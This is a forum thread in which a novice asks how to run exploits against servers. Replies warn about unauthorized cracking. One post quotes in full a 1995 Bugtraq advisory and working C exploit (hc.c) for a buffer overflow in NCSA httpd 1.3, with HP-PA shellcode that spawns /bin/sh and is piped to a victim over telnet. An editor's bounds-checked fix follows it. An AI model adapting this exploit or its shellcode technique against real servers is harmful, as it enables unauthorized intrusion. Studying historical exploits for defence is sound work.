Thread: Exploits a little confusing

  1. #1 (Junior Member, joined Feb 2002, 3 posts)

    Exploits a little confusing

    Total newbie on exploits, so sorry (I tried searching but couldn't find a topic).
    Now, if I understand this correctly, exploits are code written in either C or shell that exploits a vulnerability on a server and that (depending on the exploit) can give you root or super admin access.
    I know where to get them.

    The problem I'm having is how to execute them.
    I mean, take an exploit in C (ntpd-exp.c).
    How do I execute it on a vulnerable server?

    Don't I have to have some access to the server (I mean wouldn't I have to log into the server to run it)?

    Let's say I don't have access to the server (I don't have an account on it).
    How would I exploit it (or run the exploit to get access)?

    Maybe I'm missing something here?

    How does a shell (a shell account) play a role in exploits? How can I connect to a target server with my shell account and run an exploit from there (say I wanted to run an exploit on a system I don't have access to; how would I get access to the target server to run it)?

    So confusing.

    Where can I get help? or is someone willing to help a new b who just wants knowledge.

  2. #2 (Senior since the 3 dot era, joined Nov 2001, 1,542 posts)

    First of all, if you don't have an account on that server and you're not involved in a wargame or an authorized hack attempt, then you are cracking other people's servers. That's not the thing that people like here.

    About exploits: exploits can be used to gain certain rights on remote boxes by using "mistakes" made by the programmers. For instance, if you enter a certain value for a variable and the variable is badly defined, the program could do 'funny' things that make it possible to take over the box. An exploit is a program that does that for you. Perhaps you discover a fault in Explorer (very common); well, if you are a really talented programmer you could write your own tool to use that error to get some information about the target or to actually get in. There are many exploits, etc. I'm not going to write a tutorial on them here...

    (uhhh: don't start the flames and neg points for this)

    about your prog.c and running them... well you have to compile them first in an executable file, then you can use it.

  3. #3 (Senior Member, joined Aug 2001, 259 posts)

    Re: Exploits a little confusing

    Originally posted by new b
    Total newbie on exploits, so sorry (I tried searching but couldn't find a topic).
    Now, if I understand this correctly, exploits are code written in either C or shell that exploits a vulnerability on a server and that (depending on the exploit) can give you root or super admin access.
    I know where to get them.


    Exploits are usually the result of bad programming. They can be written in any language; most of the time they are found in the more powerful languages like C or assembly. Shell scripting doesn't really deal with upper-level memory control or flags that control access, so it's not typically looked at for exploits.


    The problem I'm having is how to execute them.
    I mean, take an exploit in C (ntpd-exp.c).
    How do I execute it on a vulnerable server?
    Don't I have to have some access to the server (I mean, wouldn't I have to log into the server to run it)?

    If you had access then you probably wouldn't need to exploit the server.

    Let's say I don't have access to the server (I don't have an account on it).
    How would I exploit it (or run the exploit to get access)?

    Maybe I'm missing something here?

    that's the basis of almost all cracking.

    How does a shell (a shell account) play a role in exploits? How can I connect to a target server with my shell account and run an exploit from there (say I wanted to run an exploit on a system I don't have access to; how would I get access to the target server to run it)?

    That's the other part of cracking. People study for years to learn this. A few posts on a forum aren't going to summon the magical hacking leprechauns to input that 1337 haXor knowledge into your head.

    So confusing.

    Where can I get help? or is someone willing to help a new b who just wants knowledge.
    Alternate realities celebrate reality. If you can't handle the reality you're in, then you won't be able to handle the one you're attempting to escape to.

  4. #4 (Junior Member, joined Feb 2002, 3 posts)

    Re: Re: Exploits a little confusing

    Originally posted by zepherin

    If you had access then you probly wouldn't need to exploit the server.

    Exactly what makes me so confused on how to get the exploit on the server.
    And once on the server, how do I execute it? Do I paste the WHOLE xploit and hit enter, or do I upload the C file onto the server and use SYST EXEC? Can I execute the xploit without uploading it to the server?


    That's the other part of cracking. People study for years to learn this. A few posts on a forum arn't going to sumon the magical hacking lepricans to imput that 1337 haXor knowledge into your head.
    I totally understand this, and that is why I read just about EVERY tut on the subject.
    But when it comes to exploits I am so lost. I mean, the tuts I read tell me "To gain access on the box you can run an exploit"; well, wouldn't I need to gain access before running the xploit? It seems like a vicious circle: to get access, run an exploit; to run an exploit, you need to get access. I mean, that's where I think I'm misunderstanding something.

    As far as executing them (I pretty much understand what they do): there are tons of sites that explain what the exploit does, just not how it's executed. I hear sites saying "oh, this C xploit attacks the hole in SMTP". How did they attack it? How did they run the xploit? Did they connect via Telnet to the SMTP server and just copy and paste the exploit into Telnet and hit enter? How did they EXECUTE the exploit?

    In all honesty, I want to get my own server for my design company, but these exploit problems are really seriously troubling me about the security of the server. If I knew how these xploits are run on the server I could better understand how to protect my box.

  5. #5 (Senior since the 3 dot era, joined Nov 2001, 1,542 posts)

    In all honesty, I want to get my own server for my design company, but these exploit problems are really seriously troubling me about the security of the server. If I knew how these xploits are run on the server I could better understand how to protect my box.
    Since the FreeAgent issue I'm not going to believe you... sorry.
    My "trust" is at a very low level for the moment.

    It seems like a vicious circle: to get access, run an exploit; to run an exploit, you need to get access. I mean, that's where I think I'm misunderstanding something.
    LOL

    sorry,

    some exploits like the one based on the recently found fault in Explorer 5.x and 6.x run a certain script that allows to run any executable.

    The Sircam worm uses rundll32.exe; rundll32.exe makes it possible to run a 32-bit function exported from a DLL.

    So for instance someone can send you a little program that attempts to edit some files on your PC, like autoexec.bat or lmhosts, or replace a DLL with a malicious one to create holes. But those programs are more like trojans...

    Do you really believe that gaining access to a server is simple: press ENTER ?????

    LOL, ROFL

  6. #6 (Senior since the 3 dot era, joined Nov 2001, 1,542 posts)

    For instance, here's an example showing that it's not a simple "press enter" or something... that would only be stealing someone else's work.

    credits for this example go to the original author: Thomas Lopatic

    HACK: NCSA "httpd" 1.3 can be tricked into executing shell commands
    Version: 1.3
    System: HP-UX 9.01, Unix?
    Source: Thomas Lopatic (lopatic@dbs.informatik.uni-muenchen.de) Bugtraq
    Date: Mon, 13 Feb 1995
    CIAC: Number F-11, February 14, 1995
    **************************************************************************

    We've installed the NCSA HTTPD 1.3 on our WWW server (HP9000/720,
    HP-UX 9.01) and I've found that it can be tricked into executing shell
    commands. Actually, this bug is similar to the bug in fingerd exploited by
    the internet worm. The HTTPD reads a maximum of 8192 characters when
    accepting a request from port 80. When parsing the URL part of the request
    a buffer with a size of 256 characters is used to prepend the document root
    (function strsubfirst(), called from translate_name()). Thus we are able to
    overwrite the data after the buffer. Since the stack grows towards higher
    addresses on the HP-PA, we are able to overwrite the return pointer which
    is used to return from the strcpy() call in strsubfirst(). The strcpy()
    overwrites its own return pointer. On systems with a stack growing the
    other direction, we'd have to overwrite the return pointer of strsubfirst().

    I've implemented this attack for the precompiled HP-PA release provided
    by the NCSA. To adapt it to custom versions, you have to know the address
    of the buffer used by strsubfirst() and the offset of the return pointer.
    One might adapt the program to try 'probable' values, i.e. values within a
    certain range, if these parameters are not known. I've tried 'cc' and 'gcc'
    with and without optimization and the parameters didn't vary too much. A
    generic attack using brute force should therefore be possible.

    This is the program I've used to break into our WWW server. The assembly
    code could have been more compact, but I had to avoid 0x00 bytes. The
    program creates a file named 'GOTCHA' in the '/tmp' directory.

    Greetings and happy experimenting,
    -Thomas


    --- cut here ---

    /* hc.c */

    /* This program demonstrates a vulnerability in the NCSA httpd 1.3 */
    /* We make use of a buffer overflow in order to execute commands */
    /* on a HP host running the precompiled daemon provided by the NCSA. */

    /* The problem is that the array 'tmp' in the function 'strsubfirst()' */
    /* has a length of MAX_STRING_LEN. However, the function can be passed */
    /* arguments with up to HUGE_STRING_LEN characters. */

    /* The output of this program can be pasted into a telnet session */
    /* to port 80 of the host to be attacked. */
    /* Alternatively simply use 'hc | telnet www.victim.com 80'. */

    /* Written by Thomas Lopatic, lopatic@informatik.uni-muenchen.de */

    #include <stdio.h>
    #include <string.h>

    /* Instead of defining these macros we could try all probable values */
    /* in case the attacked host does not run the precompiled httpd. */

    /* The address of 'char tmp[MAX_STRING_LEN]' in the precompiled httpd. */
    #define TMPVAR 0x7b03df80

    /* This is an offset from TMPVAR. The return pointer for the call to */
    /* strcpy() is stored here (in the precompiled httpd). */
    #define RPOFF 0x160

    /* Byte order of the attacked HP is big endian. */
    #define SHIFT1 24
    #define SHIFT2 16
    #define SHIFT3 8
    #define SHIFT4 0

    /* Output the lower nibble of i as an upper-case hex digit. */
    char d2a (int i)
    {
        i &= 0xf;
        return (i > 9) ? (i + 'A' - 10) : (i + '0');
    }

    /* This is the short assembly language program which will be executed. */
    /* (HP-PA machine code; it contains no 0x00 bytes because the request */
    /* is handled as a C string.) */
    char prog[] = {
        0x34, 0x59, 0x01, 0x02, 0x34, 0x5a, 0x01, 0x32,
        0x37, 0x5a, 0x3e, 0xf9, 0x6b, 0x3a, 0x3f, 0x01,
        0x63, 0x40, 0x3f, 0xff, 0x34, 0x5a, 0x01, 0x38,
        0x63, 0x40, 0x3f, 0x35,
        0x37, 0x5a, 0x3e, 0xf9, 0x6b, 0x3a, 0x3f, 0x09,
        0x63, 0x40, 0x3f, 0xff, 0x0b, 0x5a, 0x02, 0x9a,
        0x6b, 0x3a, 0x3f, 0x11, 0x34, 0x5a, 0x01, 0x22,
        0x37, 0x5a, 0x3e, 0xf9, 0x6f, 0x3a, 0x3e, 0xf9,
        0x20, 0x20, 0x08, 0x01, 0x34, 0x16, 0x01, 0x1e,
        0xe4, 0x20, 0xe0, 0x08, 0x36, 0xd6, 0x3e, 0xf9,
        0x0b, 0x5a, 0x02, 0x9a, 0x20, 0x20, 0x08, 0x01,
        0x34, 0x16, 0x01, 0x0a, 0xe4, 0x20, 0xe0, 0x08,
        0x36, 0xd6, 0x3e, 0xf9, 0xe8, 0x5f, 0x1f, 0x35,
        0x0b, 0x5a, 0x02, 0x9a,
        0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
        0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
        0x00
    };

    int main (void)
    {
        char buffer[400];
        int i;

        /* Copy program, append the arguments. The '$'s are replaced */
        /* with 0x00s by the assembly language routine. */
        strcpy (buffer, prog);
        strcat (buffer, "/bin/sh$");
        strcat (buffer, "-c$");

        /* Length of the argument must be exactly 30 characters. */
        /* Otherwise the '$' will not be replaced correctly. */
        /* strcat (buffer, "0123456789012345678901234567890123456789$"); */
        strcat (buffer, "echo GOTCHA >/tmp/GOTCHA $");

        /* Output the http request. */
        printf ("GET ");

        /* Output the program, URL-encoded as %XX so every byte survives */
        /* the daemon's URL parsing. */
        for (i = 0; i < strlen (buffer); i++)
            printf ("%%%c%c", d2a (buffer[i] >> 4), d2a (buffer[i]));

        /* Fill the buffer until we have reached the memory location */
        /* which contains the return pointer for strcpy(). */
        for (i = strlen (buffer); i < RPOFF; i++)
            printf ("X");

        /* Output the entry point for our program, one nibble at a time */
        /* in big-endian order. strcpy() will 'return' into our small */
        /* assembly program. */
        printf ("%%%c%c%%%c%c%%%c%c%%%c%c\n",
                d2a ((TMPVAR + 0x60) >> (SHIFT1 + 4)),
                d2a ((TMPVAR + 0x60) >> SHIFT1),
                d2a ((TMPVAR + 0x60) >> (SHIFT2 + 4)),
                d2a ((TMPVAR + 0x60) >> SHIFT2),
                d2a ((TMPVAR + 0x60) >> (SHIFT3 + 4)),
                d2a ((TMPVAR + 0x60) >> SHIFT3),
                d2a ((TMPVAR + 0x60) >> (SHIFT4 + 4)),
                d2a ((TMPVAR + 0x60) >> SHIFT4));

        return 0;
    }
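
    Added here as an editor's example (not Lopatic's program and not NCSA's source): the unbounded prepend pattern the report describes, next to a length-checked version that rejects a request before it can overrun the 256-byte temporary. Function names, the document root value and the constructed 8191-byte URL are assumptions modelled on the text.

```c
#include <stdio.h>
#include <string.h>
#include <errno.h>

#define MAX_STRING_LEN  256   /* size of the temporary in the report */
#define HUGE_STRING_LEN 8192  /* longest request the daemon reads */

/* Vulnerable pattern (assumed shape, not NCSA's code): prepend docroot
   to path through a fixed temporary. Neither strcpy nor strcat checks
   that docroot + path fits in tmp, so a long URL runs off the end of
   the stack frame, which is exactly what hc.c above relies on. */
void prepend_unchecked(char *path, const char *docroot)
{
    char tmp[MAX_STRING_LEN];
    strcpy(tmp, docroot);
    strcat(tmp, path);     /* overflows tmp once the total exceeds 255 */
    strcpy(path, tmp);
}

/* Hardened version: measure first, refuse anything that would not fit
   in either tmp or the caller's buffer, and leave path untouched when
   refusing. Returns 0 on success, -1 with errno = ENAMETOOLONG. */
int prepend_checked(char *path, size_t pathlen, const char *docroot)
{
    size_t dl = strlen(docroot), pl = strlen(path);
    char tmp[MAX_STRING_LEN];
    if (dl + pl >= sizeof tmp || dl + pl >= pathlen) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(tmp, docroot, dl);
    memcpy(tmp + dl, path, pl + 1);    /* copies the terminating NUL */
    memcpy(path, tmp, dl + pl + 1);
    return 0;
}

int main(void)
{
    /* Constructed input: an 8191-byte URL, the largest the report says
       the daemon accepts, against a 256-byte temporary. */
    static char url[HUGE_STRING_LEN];
    memset(url, 'A', sizeof url - 1);
    url[0] = '/';
    if (prepend_checked(url, sizeof url, "/usr/local/etc/httpd/htdocs") < 0)
        printf("rejected: %s\n", strerror(errno));
    strcpy(url, "/index.html");
    prepend_checked(url, sizeof url, "/usr/local/etc/httpd/htdocs");
    printf("%s\n", url);
    return 0;
}
```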

  7. #7 (Senior Member, joined Dec 2001, 1,193 posts)

    Here's a good idea. Since you are concerned about security for your server, why don't you go to some of the excellent classes on this topic, say from Foundstone, Global Knowledge, the big-name computer firms, etc. They will be glad to take your money and give you the basics.

    Or you could work on your own systems and be self taught

    There is a price for knowledge; strange how many want its power without wanting to pay its price.

    Trappedagainbyperfectlogic.

  8. #8 (Junior Member, joined Feb 2002, 3 posts)
    Oh $hit

    I should be reading about compiling in C instead of asking how exploits work.

    I get it now: I gotta compile the exploit.

    I think I'll read some C programming books and learn about C before posting about exploits.

    Thanks All

    Also do you have any suggestions on good Compilers?
